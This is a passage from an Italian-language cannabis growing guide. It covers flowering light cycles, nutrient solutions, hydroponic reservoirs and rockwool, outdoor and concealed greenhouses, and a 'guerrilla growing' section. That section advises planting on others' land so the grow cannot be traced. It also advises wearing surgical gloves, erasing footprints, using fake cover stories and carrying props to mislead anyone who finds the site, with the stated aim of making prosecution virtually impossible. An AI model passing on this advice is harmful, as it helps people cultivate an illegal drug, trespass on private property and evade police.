dell'altra restano accese di continuo. Le piante vengono tirate su a luce continua, e
spostate nell'altra mensola per maturare con la fioritura dopo diverse settimane. Questa
mensola per la fioritura dovrebbe essere più grande della mensola di partenza o della
crescita vegetativa, in modo da sistemare piante più grandi. O altrimenti, alcune piante
possono essere portate fuori, se non c'è abbastanza spazio sulla mensola della fioritura,
per tutto il loro prossimo raccolto.
Una tenda per fermare la luce può essere costruita con del vinile nero, o altro materiale
opaco, con un materiale riflettente sull'altro lato per riflettere la luce alle piante.
Questa tenda può essere bloccata con una cordicella quando viene riavvolta per lavorare
nel tuo piccolo giardino, e può essere fissata con del velcro per impedire alla luce di
filtrare. Se la mensola è posizionata in alto, non sarà molto visibile, e potrà stare in
ogni stanza. I curiosi non la vedranno mai a meno che tu non la indichi a loro, dal
momento che si trova sopra il livello degli occhi, e nessuna luce proviene da là.
le piante fioriscono con nutrimenti di fosforo a livelli molto alti, del tipo 5-50-17, ma
anche il 10-20-10 dovrebbe essere adeguato. Le sostanze nutrienti dovrebbero essere
accompagnate ogni volta da un innaffiamento quando le piante sono in prima fioritura.
Elementi in tracce sono altrettanto necessari; cerca di trovare cibi che li includono,
così non devi usare anche un cibo a base di elementi in tracce a parte. Un piccolo
miglioramento domestico consiste nel servirsi di soluzioni a base di elementi in tracce
ricche di ferro, quelle usate per integrare le carenze dei prati, che possono essere
adattate alla coltivazione dell'erba. I prezzi per questi fertilizzanti in serie sono
di gran lunga più convenienti di quelli specifici per colture idroponiche venduti in
negozi di giardinaggio, e sembra che funzionino egregiamente.

SOLUZIONE IDROPONICA PER LA FIORITURA, per gallone:
- 1 cucchiaino di nutrimento per piante high P, come il 15-30-15, o il 5-50-17, ecc...
- 1/ 2 cucchiaino di sale inglese
- 1 cucchiaino di nutrimento per piante arricchito con ossigeno (facoltativo)
- 1 cucchiaino di sostanza con elementi in tracce

Non posso evidenziare abbastanza che durante la FASE DI FIORITURA, i periodi di buio non
devono essere violati da luce normale. Ritarda lo sviluppo del fiore per via degli ormoni
contenuti nella pianta che reagiscono alla luce. Se devi lavorare sulle piante in questo
periodo, lascia filtrare solo una luce dell'intensità di una luna molto pallida e per meno
di 5 minuti. Pota le piante il meno possibile durante l'intera fase di fioritura.
Si può usare una luce verde per lavorare nel giardino durante il periodo di buio senza
reazioni negative da parte delle piante. Queste sono vendute come luci di sicurezza per
serre, ma qualsiasi lampadina verde dovrebbe essere OK. E' preferibile non visitare il
giardino nelle ore di buio. Personalmente, preferisco lasciare illuminato il mio giardino
dalle 7 di sera alle 7 del mattino, così posso fare una visita al giardino di notte dopo
il lavoro e la mattina prima di andare a lavorare, e per tutto il resto della giornata,
quando sono troppo occupato per preoccuparmene, lui sta là indisturbato al buio, continuando
a fiorire...
Le piante in fiore non dovrebbero essere innaffiate spesso perché questo faciliterà la
formazione di muffa e putredine. Al chiuso mantieni bassi i livelli di umidità durante la
fioritura, perché questo è il periodo più delicato per le piante.
Una prima fioritura si nota 1-2 settimane dopo l'ultima esposizione alla luce per 12 ore al
giorno. Cerca 2 peli bianchi che emergono da una piccola area bulbosa per ogni internodo.
Questo è il modo più facile per verificare subito se la pianta è femmina. Non puoi
distinguere un maschio da un femmina dall'altezza, o dalla rigogliosità delle foglie.
A 3-6 settimane dall'ultima esposizione alla luce, le tue piante saranno coperte di questi
pistilli bianchi che spuntano da ogni picciolo sulla pianta. Sarà letteralmente ricoperta
di questi. Questi sono i fiori maturi, che continuano a crescere e a coprire la pianta.
Alcune piante faranno questo indefinitamente fino a quando la luce sarà nuovamente tornata.
A questo punto sei pronto per vedere i fiori esistenti divenire maturi (senti che la pianta
ha abbastanza fiori), riaccendi le luci per 8-10 ore. Ora la pianta comincerà a maturare
rapidamente, e dovrebbe essere pronta per il raccolto in 2-3 settimane. L'alternativa è
permettere alla pianta di maturare con qualsiasi durata naturale del giorno disponibile
all'aperto, o tenere le piante ad un regime costante di 12 ore per l'intero processo di
fioritura, che può aumentare la produzione, ma impiegare più tempo.
Le piante possono fiorire all'aperto nell'ultima fase, anche se i giorni sono ancora troppo
lunghi per una normale fioritura. Una volta che la pianta ha raggiunto quasi il picco dello
sviluppo floreale, è anche troppo avanti per regredire rapidamente allo stadio della crescita
vegetativa, e la fioritura definitiva si verificherà malgrado tutto. Questo libererà spazio
prezioso al coperto in poco tempo, per il prossimo lotto di cloni da fiorire.
Osserva quando i peli bianchi diventano rossi, arancioni o marroni, e i finti baccelli
(hai scartato bene i maschi?) si ingrossano di resina. Quando la maggior parte dei pistilli
ha cambiato colore (circa l'80%), i fiori sono maturi per il raccolto.
Non toccare quelle gemme! Tocca solo le grandi foglie a ventaglio se vuoi ispezionare le
gemme, altrimenti il THC resterà sulle tue dita, riducendo così la produzione complessiva.



COLTURE IDROPONICHE

La maggior parte dei coltivatori riferisce che un sistema idroponico svilupperà le piante
più velocemente rispetto ad un sistema tradizionale a base di terra, dando alle piante le
stesse caratteristiche genetiche e condizioni ambientali. Questo può essere dovuto ad una
maggiore attenzione e controllo dei nutrimenti, e ad un più ricco apporto di ossigeno. Le
piante possono respirare con più facilità, e per questo, impiegano meno tempo per crescere.
Un rapporto indica come le piante che hanno cominciato nella terra, maturate dopo le piante
idroponiche, partono con due settimane di ritardo!
Una rapida crescita garantisce una maturazione anticipata e un periodo di crescita totale
per il raccolto più ristretto. Inoltre, con misture di terra, la crescita della pianta tende
a rallentare quando le piante iniziano a fissarsi alla terra con le radici. Le colture
idroponiche assicurano inoltre, una rapida crescita senza interruzioni per un trapianto in
blocco ed elimina il lavoro e i materiali del ripiantare nel vaso qualora la lana di roccia
fosse già usata. (Molto consigliato!)
I sistemi idroponici di gran lunga più facili da usare sono lo stoppino e i sistemi a
serbatoio. Questi sono indicati come Metodi Idroponici Passivi, perché non richiedono alcun
sistema di distribuzione dell'acqua su una scala attiva (pompa, drenaggio, misuratore di
flusso e corso). Questi sistemi si basano sul fatto che tu puoi portare l'acqua nei punti
che preferisci se l'ambiente e le condizioni primarie sono corretti.
Il sistema dello stoppino è più complesso del sistema del serbatoio, dal momento che gli
stoppini devono essere tagliati e sistemati nei vasi, devono essere scavati nei vasi buchi
corretti, e bisogna ricavare dello spazio per sistemare le piante sopra il serbatoio dell'
acqua. Questo può essere più semplice con due secchi, uno sistemato dentro all'altro, o una
piscina in gomma per bambini con mattoni all'interno su cui sistemare i vasi, elevandoli
oltre la soluzione nutriente.
Trovo che l'installazione dello stoppino sia più funzionale del sistema del serbatoio. L'
installazione iniziale è laboriosa con gli stoppini, e le piante si sviluppano maggiormente
in altezza nella stanza, occupando prezioso spazio verticale. La base del vaso non può
restare molto stabile in confronto ad un sistema a serbatoio, ed una pianta rovesciata a
terra non sarà mai uguale ad una pianta intatta, a causa dello stress e dello shock del
recupero.
Il sistema del serbatoio ha bisogno solo di un buon ambiente adattato al compito, ed una
pentola in cui mettere un vasetto. Se si usano strisce di lana di roccia, mezza striscia
di lana di roccia da 30 centimetri sta perfettamente in una vaschetta tipo una lettiera per
gatti. Le radici si sviluppano per via orizzontale (fortunatamente) ed hanno a disposizione
molto spazio per crescere. Le piante cresciute in questa maniera sono molto robuste perché
ricevono molto ossigeno alle radici. Le piante cresciute con il sistema idroponico a
serbatoio si sviluppano con un ritmo analogo a quello del metodo degli stoppini o di altri
metodi idroponici attivi, con molto meno impegno richiesto, dal momento che è di gran lunga
il più semplice dei metodi idroponici. Le piante possono essere annaffiate e nutrite soltanto
con una soluzione che fluisce nel serbatoio ogni pochi giorni. Le vaschette occupano veramente
poco spazio verticale e sono facili da maneggiare e da spostare.
In un metodo idroponico tradizionale, le vaschette sono riempite con una mistura di
lava/vermiculite in un rapporto di 4 a 1. Si aggiunge 'Dolite Lime', un cucchiaio per
gallone (circa 4 litri). Questo sistema fermerà e accumulerà acqua, anche se è dotato
di un eccellente drenaggio ed anche della capacità di immagazzinare aria. E comunque, non
è molto riutilizzabile, come anche è difficile da riprendere e sterilizzare dopo il raccolto.
Usa lava di piccole dimensioni, quelle di un pisello di 7,5/20 cm per intenderci, e lava via
la polvere, più e più volte, fino a quando se ne è quasi tutta andata. Bagna la vermiculite
(asciutta è pericolosa, indossa una maschera) e mescolala nelle vaschette. Le vaschette
quadrate sono più capienti di quelle rotonde. La vermiculite si depositerà sul fondo dopo
ripetuti innaffiamenti dall'alto, in modo che solo l'acqua proveniente dall'alto di quando
in quando laverà qualche deposito di minerali, perciò aggiungi più vermiculite in cima che
sul fondo. Fai dei buchi sul fondo delle vaschette, ed aggiungi acqua al vaso. Si fermerà
alle radici e le piante avranno tutto il necessario per fiorire.
Il serbatoio viene riempito con 4-8 cm di acqua e sistemato in modo che l'acqua si ritiri
tra un innaffiamento e l'altro. Quando possibile, usa meno soluzione e più spesso acqua,
per girare più ossigeno alle radici nel minor tempo possibile. Se parti per le vacanze,
riempi semplicemente i serbatoi fino all'orlo, e le piante avranno un apporto d'acqua per
almeno 2 settimane.
Un mezzo idroponico veramente eccezionale è la schiuma floreale Oasi. Crea molti buchi in
essa per aprirla un po' e comincia all'interno la coltivazione delle piante/cloni, passando
dal blocco di schiuma alla lana di roccia in seguito per gli stadi di crescita più avanzati.
Molti preferiscono la schiuma floreale, siccome è inerte, e non aggiunge alcun fattore PH.
Purtroppo è costosa, e tende a sbriciolarsi facilmente. Non sono inoltre sicuro se sia molto
riutilizzabile, ma sembra che sia un prodotto popolare nei negozi di giardinaggio.
Si può piantare con più facilità con mezzi idroponici che richiedono poca manutenzione come
la lana di roccia. I pezzi di lana di roccia possono essere riutilizzati in tempi successivi,
e sono preconfezionati per usarsi in colture idroponiche. Alcuni vantaggi della lana di
roccia sono costituiti dal fatto che è impossibile eliminare l'acqua e non c'è bisogno di
trapianto. Sistema soltanto la scatola della pianta in cima ad una più grande di lana di
roccia e goditi il tuo tempo libero extra.
Alcuni si trovano meglio a risparmiare denaro non acquistando lana di roccia ma impiegando
il tempo a piantare in terra o in sistemi idroponici come la miscela vermiculite/lava. La
perlite va bene, visto che c'è molta luce. La perlite può essere usata al posto o in aggiunta
alla lava, che deve essere risciacquata ed è molto più pesante.
Ma la lana di roccia ha molti vantaggi che non sono apprezzati fino a quando si è costretti
ad impiegare diverse ore a trapiantare in vasi più grandi; pensaci due volte. Non è molto
costosa, ed è riutilizzabile. E' più stabile della schiuma floreale, che si schiaccia e si
sbriciola facilmente. La lana di roccia trattiene l'acqua 10 volte di più della terra,
inoltre è impossibile eliminare l'acqua, perché trattiene sempre un'alta percentuale di
aria. Soluzione migliore di tutte, non c'è bisogno di alcun travaso; sistema solamente
una scatola di partenza in un cubo di lana di roccia destinata alla crescita, e quando
la pianta diventa molto grande, sistema questa scatola su un pannello di lana di roccia.
Dal momento che la lana di roccia è facilmente riutilizzabile più e più volte, il costo
viene diviso per 3 o 4 raccolti, e finisce per costare non più della vermiculite e della
lava, che sono molto più difficili da recuperare per un uso intensivo, da sterilizzare e
riutilizzare (ritravasare) in confronto alla lana di roccia. La vermiculite è anche molto
pericolosa quando asciutta, e finisce per disperdersi in coltri e nell'aria quando la
tocchi (anche bagnata), dal momento che si asciuga sulle dita e diviene volatile. Per
questa ragione non è consigliabile la vermiculite al coperto.
Gli svantaggi della lana di roccia sono relativamente pochi. E' a PH alcalino, così devi
usare qualche cosa nella soluzione nutriente per renderlo acido (5.5) in modo tale da portare
i valori della lana di roccia dal 7.7 al 6.5 (l'aceto funziona bene.) E' irritante per la
pelle quando è asciutta, ma non è un problema quando è bagnata.
Per pretrattare la lana di roccia per piantare, immergila in una soluzione di emulsioni di
pesce, minerali in tracce ed acido fosforico (PH basso) per 24 ore, quindi risciacqua.
Questo diminuisce la richiesta di PH che si verifica in seguito, quando tamponi il PH della
lana di roccia per renderlo abbastanza neutro.
Le colture idroponiche dovrebbero essere impiegate al coperto o in serre per velocizzare
la crescita delle piante, per ottenere così più gemme in meno tempo. Le colture idroponiche
ti permettono di annaffiare le piante giornalmente, e questo accelererà la crescita. La
differenza principale tra una coltura idroponica e una in terra è che terreno idroponico o
"ambiente" viene impiegato per trattenere l'umidità, ma smaltisce bene, e così non c'è
nessun problema di sovrainnaffiamento connesso ad una irrigazione continua. Inoltre, le
piante cresciute idroponicamente non ricavano i nutrimenti dal suolo, ma dalla soluzione
usata per innaffiare le piante. Le colture idroponiche riducono la preoccupazione di
incrementare i minerali nel suolo, e la carenza di ossigeno che può soffocare le radici,
così la lisciviazione non è normalmente con le colture idroponiche.
Le colture idroponiche permettono di usare contenitori più piccoli per piante della stessa
dimensione, in confronto alla crescita in terra. Un vaso da 3 litri può facilmente essere
usato per portare una pianta cresciuta idroponicamente alla maturazione. Questo sarebbe
difficile da realizzare nella terra, dal momento che i nutrimenti vengono subito consumati
e le radici vengono private dell'ossigeno quando fissano a terra le radici. Questo problema
non sembra verificarsi quasi più rapidamente per le piante idroponiche, dal momento che le
radici possono ancora assorbire nutrimenti da una alimentazione a soluzione costante, e
l'ambiente trasmette ossigeno molto più prontamente quando le radici si fissano nel piccolo
contenitore.
Il nutrimento delle piante deve essere somministrato con molti innaffiamenti, e garantisce
al giardiniere di controllare scrupolosamente quali nutrimenti hanno a disposizione le piante
nei vari stadi della crescita della pianta. L'innaffiamento può essere automatizzato per certi
aspetti con un semplice ed economico apparato di innaffiamento a gocce, in modo da
avvantaggiarsene quando possibile.
Le colture idroponiche affretteranno il tempo di crescita, così ci vorrà meno tempo tra
la semina e il raccolto. Ha senso usare semplici tecniche idroponiche passive quando
possibile. Le colture idroponiche non sono certo indicate per la coltivazione all'esterno,
a meno che non si possieda una serra.
ATTENZIONE: è necessario badare con molta cura alle piante per assicurarsi che non perdano
molta acqua e si secchino durante la fase della crescita idroponica, altrimenti le radici
saranno compromesse. Se non sei in grado di occuparti del giardino ogni giorno, accertati
che le vaschette siano riempite a sufficienza fino al tuo prossimo ritorno, oppure potresti
perdere con estrema facilità il tuo raccolto.
I metodi idroponici (attivi) più tradizionali non vengono trattati qui. Non vedo un qualche
punto nella loro messa in opera più difficile del necessario. E' indispensabile cambiare la
soluzione ogni mese se la fai circolare tramite un pompa, ma il sistema del serbatoio elimina
questo problema. Risciacqua soltanto il recipiente una volta al mese o giù di lì per prevenire
la formazione di sali annaffiando dall'alto della vaschetta o cubo di lana di roccia con
acqua pura. Cambia i nutrimenti della pianta spesso per evitare carenze nutritive nelle piante.
Consiglio di usare 2 diversi nutrimenti per piante per ciascuna fase della crescita, o 4
nutrimenti in totale, per ridurre i casi di carenza di una qualche sostanza.
Cambia la soluzione più spesso se osservi che il PH cala rapidamente (troppo acido). A
causa dello scambio dei cationi, la soluzione tenderà a diventare troppo acida col tempo,
e questo causerà una indisponibilità di nutrimenti alle piante. Controlla il PH dell'ambiente
di crescita ogni volta in cui annaffi per accertarti che non si verifichi alcuna perdita di
PH.
Con elevate concentrazioni di umidità nell'ambiente idroponico è probabile la formazione di
alghe all'interno dei vasetti. Le alghe trasformeranno il pannello di lana di roccia di un
colore grigio scuro. Per prevenire questo, stendi una pellicola plastificata sui bordi
superiori del pannello di lana di roccia, con dei buchi aperti per farci sporgere all'esterno
di essa le piante. E' facile tagliare un pannello impacchettato di lana di roccia in due
pezzi, quindi taglia le estremità della plastica che sporgono da ogni pezzo. Ora hai due pezzi
di lastra, ciascuno rivestito di plastica eccetto le estremità. Quindi incidi 2 o 3 buchi di
10 cm quadrati in cima per metterci sopra i cubi, e sistema ciascun pezzo in una vaschetta
pulita. Ora sei in grado di trattare la lana di roccia come descritto sopra nel capitolo
riguardante l'anticipazione della semina.
Se coltivi in vasi, vaschette, uno strato di ghiaia sulla cima del vaso può aiutare a ridurre
la formazione di alghe, dal momento che assorbe l'acqua molto rapidamente. Le alghe sono
soltanto fastidiose e brutte da vedere; non arrecheranno alcun danno alle piante.


RICICLAGGIO

Serviti di vasi ricavati da contenitori più o meno quadrati del tipo dei brick d'acqua in
plastica, ecc.... Più piante staranno in meno spazio ed avranno un'area maggiore per mettere
radici se vengono impiegati contenitori quadrati. Questo fa del tuo giardino un centro di
riciclaggio, e ti permette di risparmiare montagne di soldi.
I bottiglioni di coca da 2 litri vanno bene, ma non sono quadrati. 13 di questi staranno
giusti in una vaschetta delle dimensioni di una lettiera per gatti, e porteranno una pianta
da un metro alla maturazione per via idroponica. Se puoi disporre di 4 vaschette in un
ripostiglio, potrai coltivare 52 piante come questa per via vegetativa. Distanziale per la
fioritura.
Vecchi secchi, contenitori di plastica da 10-20 litri (industrie alimentari e di vernici,
prova a rovistare tra i rifiuti di un imbianchino o di un ristorante), secchi di vernice in
cartone, vecchi bidoni dell'immondizia in plastica di ogni misura e sacchi della spazzatura
sono tutti usati con successo dai coltivatori di maria.
Non usare i cartoni del latte e del succo di frutta per le colture idroponiche a serbatoio,
dal momento che sono difficili da sterilizzare, ed introducono colonie di funghi nelle tue
vaschette a serbatoio. Materiali inerti, come la plastica, sono la cosa migliore.
Assicurati di sterilizzare tutti i contenitori prima di ogni travaso con una soluzione di
candeggina al cloro con 2 cucchiai di candeggina per circa 4 litri d'acqua. Lascia il
contenitore e il sistema, tipo la lana di roccia, ammollo per diverse ore nella soluzione
prima di risciacquarli completamente.


COLTIVARE FUORI

Coltivare all'aperto è la cosa migliore. L'erba cresciuta all'aperto è di gran lunga più
forte, dal momento che riceve più luce, ed è naturalmente più robusta. Non c'è problema di
mancanza di luce. Nessun periodo di buio che ti costringa a restar fuori dal tuo luogo di
coltivazione. Nessuna bolletta della luce. La luce solare tende a raggiungere più parti della
pianta, se la crescita si verifica sotto un'esposizione diretta dei raggi. A differenza della
crescita al coperto, le parti basse della pianta saranno sviluppate quasi come la cima.
All'aperto, fuori da una serra, ci sono molti fattori che possono distruggere il tuo raccolto.
Il cervo cercherà di mangiarle. Scoiattoli ed altri roditori lo stesso. Gli insetti vi si
annideranno, ed il vento e la pioggia possono fare a pezzi le tue piccole gemme se sono
esposte a violenti temporali. Per queste ragioni l'erba al coperto può essere migliore di
quella all'aperto, ma il miglior fumo che abbia mai assaggiato era quello cresciuto all'
aperto, quindi pensaci bene: niente batte il sole.
Tira su un recinto e assicurati che stia in piedi. Fai visita alla tua piantagione almeno
una volta ogni due settimane, e preferibilmente più spesso se c'è carenza d'acqua.
E' una buona idea servirsi del terreno se non si possiede una serra, dal momento che le
colture idroponiche sono meno affidabili fuori all'aria aperta, a causa soprattutto della
forte evaporazione.
L'esposizione alla luce è un fattore molto importante nell'individuazione di un luogo per
una serra o per un'area all'aperto. Un coltivatore domestico avrà bisogno di sapere dove il
sole splende per il periodo più lungo; subentreranno anche la privacy ed altri fattori. Cerca
di individuare un punto defilato che riceve luce piena d'inverno da metà mattina a metà
pomeriggio, almeno dalle 10 del mattino alle 4 del pomeriggio, preferibilmente dalle 8 alle
5. Ciò sarà veramente indispensabile se vivi a 30 gradi di latitudine nord (California) o
superiori dal momento che d'inverno le giornate sono corte. Dal siccome la maggior parte dei
giardinieri non vuole usare la serra nel cuore dell'inverno, puoi anche usare il sole
invernale come un indice di buone esposizioni alla luce primaverile ed autunnale. Di solito
il lato a sud di una collina riceve la maggior parte dei raggi solari. Inoltre, grandi aree
aperte al sole sul lato nord della proprietà avranno buone esposizioni a mezzogiorno.
Esposizioni ad est e ad ovest possono risultare buone se hanno una piena insolazione di
mattina/pomeriggio e anche a mezzogiorno. Alcuni libri riferiscono che le piante rispondono
meglio ad un'esposizione solare esclusivamente mattutina, e non altrettanto ad un'esposizione
esclusivamente pomeridiana, così se devi scegliere tra le due, sappi che il sole di mattina è
meglio.
Camuffa la tua serra come un capannone degli attrezzi, o struttura simile, usando soltanto
un muro ed un tetto di plastica opaca bianca, PVC, Filon, o vetro, ed usa un materiale
colorato alla stessa maniera per il resto del capanno, oppure dipingilo di bianco o d'argento,
per farlo somigliare a metallo. Cerca di farlo sembrare come se fosse stato sempre là,
circondato da piante ed alberi per nasconderlo da occhi indiscreti quando viene investito
dalla luce del sole.
Filon (fibre di vetro increspate) o pannelli in PVC possono essere impiegati all'aperto
per coprire le giovani piantine cresciute assieme nel giardino. Compra pannelli opachi da
serra, e rendili opachi con una tintura bianca (ricavata dalla calce) o con una resina
epossidica tinta di bianco o grigio e dipingili con uno strato sottile. Questo farà filtrare
più luce solare del PVC o del Filon bianchi, ed in più nasconde le piante. Rivestimenti in
resina epossidica conservano il Filon per molte stagioni in più di quanto altrimenti potrebbe
durare. Permetterà inoltre di far sembrare il capanno rivestito di metallo, se dipingi i
pannelli bianchi di Filon con uno strato sottile di resina tinta di grigio chiaro. La pittura
andrà bene lo stesso, ma non potrà proteggere più di tanto. Curati di usare solo il minimo
indispensabile, per ridurre il blocco dei raggi solari al minimo.
Scava un bel buco, non dipende dalla pianta poter penetrare l'argilla ed il pietrisco a meno
che tu non sia sicuro della qualità dello strato superficiale del terreno dell'area. I prati
erbosi avrebbero in linea di massima un buon suolo superficiale, ma il tuo prato dietro casa
forse no. Solo questo può fare la differenza tra una modesta pianta alta un metro e mezzo e
un mostro alto tre metri al momento del raccolto. Coltivare nel terreno è sempre meglio che
coltivare in vaso, dal momento che la pianta nel terreno non sarà mai limitata nello sviluppo
delle radici. Le piante cresciute nel terreno dovrebbero svilupparsi molto di più, ma
richiederanno molto più spazio per ogni pianta, così secondo i piani, non potrai spostarle
una volta piantate!
Potresti voler tenere le piante all'aperto in vasi in modo da poterli spostare facilmente.
Un bel buco consentirà di introdurvi il vaso, in modo da ridurre l'altezza della pianta,
qualora il livello del recinto fosse un problema. Molti coltivatori fanno notare che i vasi
hanno salvato un raccolto che doveva essere spostato per alcuni inaspettati motivi (tecnici
riparatori, stimatori, fuoco, ecc...).
E' sempre meglio sistemare un tetto sopra le tue piante all'aperto. Quando ero un ragazzino,
avevamo piante che crescevano sopra la staccionata di confine del cortile di casa. Abbiamo
cominciato a costruire un tetto di serra per loro, ed un pulotto ci ha beccati a trasportare
assi di legno, e pensando che le stessimo rubando (anche se non era così) ha visto al di là
recinto noi e le nostre amate piante. Siamo stati arrestati, perché le aveva scoperte. Se
avesse visto un capanno coperto da un tetto invece, non ci sarebbe mai stato alcun problema.
Morale della storia: costruisci il tetto prima che le piante sbuchino al di sopra del
recinto! O falle crescere in modo che stiano al di sotto. Vivi e impara...
Quando coltivi lontano da casa, in un terreno incolto, l'acqua è il fattore più determinante,
dopo la sicurezza. L'acqua deve trovarsi nelle vicinanze, o vicino alla superficie del suolo,
altrimenti la devi portare tu raccolta in recipienti. L'acqua è pesante e questo è un lavoro
molto faticoso. Cerca di trovare un'area vicino ad una sorgente d'acqua se possibile, e
procurati un secchio da tenere nelle vicinanze per portare l'acqua alla tua piantagione.
Un'idea bizzarra a questo riguardo è quella di trovare acqua di alta montagna, ad alta quota,
e quindi incanalarla giù in un luogo più basso nelle vicinanze. E' possibile creare pressione
dell'acqua in un tubo in modo analogo, e incanalarla in un sistema di irrigazione a gocce che
pompa l'acqua alle tue piante in continuazione. Prendi una tanica di benzina da 20 litri e
forala con tanti piccoli buchi. fai uscire un tubo dall'apertura principale e assicuralo in
qualche modo. Seppellisci il barattolo di metallo in un fiume o ruscello sotto culla, in modo
che sia occultata e sommersa. Immergi la tanica in un corso d'acqua o rigagnolo sotto degli
anfratti, in modo che sia nascosto e sommerso. Immergi il tubo che esce dalla tanica e fallo
scorrere giù dall'altura fino al tuo appezzamento. Una piccola opera di ingegneria può
risparmiarti un bel po' di lavoro, e questa attrezzatura può essere usata anno dopo anno.


COLTIVAZIONE DI GUERRIGLIA

Coltivazione di guerriglia si riferisce alla coltivazione lontano dal proprio possedimento o
in una remota ubicazione del possedimento dove la gente raramente si aggira. E' possibile
trovare luoghi che per una ragione o per l'altra non sono facilmente accessibili o sono
proprietà private.
Cerca di coltivare lontano dalla tua proprietà, su una proprietà adiacente, in modo che se
la tua piantagione viene scoperta, non sarà facile risalire a te. Se non è nella tua
proprietà, nessuno ha testimoniato la tua presenza là, e non c'è alcuna evidenza fisica d
ella tua presenza (impronte, impronte digitali, tracce, capelli, ecc...), allora è
virtualmente impossibile perseguirti per un qualsiasi reato, anche se gli sbirri pensano di
sapere a chi appartiene.
Non confidare mai a nessuno cosa stai coltivando. La tua miglior difesa è quella di dire che
stavi semplicemente passeggiando attraverso l'area, e che, notato qualcosa di strano, avevi
deciso di dare un'occhiata, oppure porta con te una canna da pesca o un binocolo ed afferma
di andare a pesca o di osservare gli uccelli.
Non rivelare mai a nessuno dove sono localizzate le piante. Non portare visitatori a vederle,
a meno che sia tempo di raccolto, e le piante debbano essere colte lo stesso giorno o in
quello successivo.
Accertati che le tue piante siano nascoste alla vista di chicchessia. Prendi una strada
diversa per raggiungerle se non sono in una parte sicura della tua proprietà, e copri le
tracce per far credere che non sia una zona praticata. Lascia dei segnali lungo il sentiero,
in modo che la gente sul sentiero principale tenda a perdere le indicazioni per l'area
coltivata. Non parcheggiare sulla strada principale, trova sempre un posto per parcheggiare
che non desti sospetto nella gente che passa per la strada. Tieni sempre una cassetta di
"pronto intervento" nell'area se non coltivi vicino a casa. Ogni ragione è buona per trovarsi
sul posto; cerca quindi di avere tutti gli oggetti necessari per rendere credibili le balle
che eventualmente hai raccontato.
Rovi e rametti di edera sono perfetti per aprirsi dei varchi attraverso. L'edera velenosa deve
essere lavata via prima che si manifesti una reazione allergica. Il Teknu è una soluzione di
sapone speciale che neutralizzerà l'edera velenosa prima che abbia tempo di reagire. Applica
il Teknu immediatamente dopo il contatto e fatti una doccia entro 30 minuti.
Cerca di piantare sotto alberi, in vicinanza di cespugli e tieni solo alcune piante per ogni
singolo punto. Aggiusta o guida le piante affinché si sviluppino ai lati o fai qualcosa per
prevenire il classico "albero di Natale" che si nota nella maggior parte delle piante lasciate
crescere senza guida. Fissando le cime al terreno consentirai ai rami delle piante di crescere
verso il sole, ed aumenterai la produzione, con una stagione di crescita lunga abbastanza. Le
piante possono crescere sotto gli alberi se il sole giunge con la giusta angolazione e
illumina l'area per diverse ore al giorno. Le piante dovrebbero ricevere almeno 5 ore di luce
solare diretta ogni giorno, ed altre 5 ore di luce indiretta. Cerca di procurarti scarpe che
puoi usare sulle punte e cancella le impronte dei tuoi passi. Usa guanti chirurgici e cerca
di non lasciare impronte digitali sui vasi e su altri oggetti che potrebbero farti
identificare dalla pula... nel caso in cui la tua erba venga scoperta da passanti.
Tira su un recinto, o le tamie, gli scoiattoli e i cervi mordicchieranno le tue piccoline
fino a che non rimarrà nulla. Una rete di filo verde ed una di nylon per polli vanno molto
bene e possono essere avvolte attorno agli alberi per creare una barriera impenetrabile.
Controllale sempre ed eventualmente riparale ad ogni visita che fai al giardino. Una barriera
di lenze da pesca, una a 50 cm e l'altra ad un metro di altezza terrà la maggior parte dei
cervi lontano dal tuo raccolto.
Cereali per tartarughe gopher sono disponibili per le aree come le montagne della California
settentrionale, in cui topi di bosco e tartarughe gopher mangeranno il tuo raccolto se solo tu
concederai loro un'opportunità di farlo. Il miglior recinto del mondo non terrà i topi
lontano dalle tue piante! Non usare sapone per tenere lontano i cervi perché attirerà i
topi! (Il grasso del sapone è commestibile per loro.) Metti dei grani di veleno in una
mangiatoia in cui solo i piccoli roditori possono entrare, in modo che gli uccelli e i
cervi non possano mangiarli. Disponi il veleno in anticipo, prima di iniziare a piantare.
I ratti devono mangiare i grani per diversi giorni prima che abbiano un qualche effetto su
di loro. In definitiva, puoi trovare più facile coltivare all'interno di una serra sul retro
del tuo cortile piuttosto che cercare di trattenere i ratti dal mangiare la tua piantagione
all'aperto.
Quando coltivi lontano da casa, in terreni incolti, l'acqua è il fattore più determinante,
dopo la sicurezza. La quantità che puoi coltivare è direttamente proporzionale all'acqua
disponibile. Se devi raccogliere acqua, portala in un zaino nel caso tu sia stato visto lungo
il tragitto che porta alle tue colture; farai sembrare di essere soltanto un escursionista,
non un coltivatore.
Trasportare le piante che hanno iniziato la crescita vegetativa nell'area di coltivazione è
un aspetto molto complesso della coltivazione all'aperto. Di solito, si comincia a coltivare
le piante al coperto, o fuori nel giardino, quindi le si trasporta al luogo di coltivazione
una volta che si sono saldamente formate. Può essere d'aiuto individuare e separare per prima
cosa i maschi dalle femmine così non dovrai imbatterti nello sforzo di trasportare, piantare
ed innaffiare le piante maschio.
Un suggerimento è quello di usare cubetti di lana di roccia da 8 cm per cominciare al loro
interno le pianticelle, quindi metterne 20 di loro in una vaschetta, coprirla con un'altra
vaschetta e trasportarle sul posto dove vorrai coltivarle. I cubetti possono essere piantati
direttamente nel terreno. Se vieni beccato nel tragitto che ti porta alla piantagione, la
scusa di andare a seppellire un gatto morto potrebbe essere efficace: ben pochi ti chiederanno
di guardare un cadavere in decomposizione!
Sappiamo che un coltivatore all'aperto rinuncia ai semi. Fa molti sacrifici e gli piace
praticare la clonazione, così comincia con 200 cloni nel suo ripostiglio, quindi li
trasporta all'aperto in scatoloni fino al posto dove devono essere coltivati. Nessun maschio,
nessuna differenziazione, nessuna ripulitura dalle erbacce, nessun seme che germina, nessuna
impurità genetica, nessun raccolto dedicato ai semi, nessun problema di trasporto, travaso e
innaffiamento delle piante, devi solo curarti di raccogliere in un secondo tempo, nessun
incubo di impollinazione, nessuna fatica sprecata!


CONCIMI

Ua il prodotto Super Soil, dato che questo è l'unico concime conosciuto sulla Costa Ovest
certificato per dare i migliori risultati. Molte altre marche sono per lo più prodotti per
sottobosco ed hanno quindi pochissime sostanze nutritive, sono troppo umidi ecc... Aggiungi
vermiculite, perlite o sabbia al Super Soil per incrementare il suo drenaggio ed aerazione.
I giardinieri organici usano un composto preparato da loro stessi da una mistura di pollo,
mucca o altro concime ed avanzi di cibo, fogliame, erba tagliata, peli di cane ed altri
rifiuti incluso il tuo piscio, che ha alti indici di azoto. Il pelo del cane non è consigliato
per coltivatori di guerriglia che piantano lontano dalla loro proprietà dove la polizia
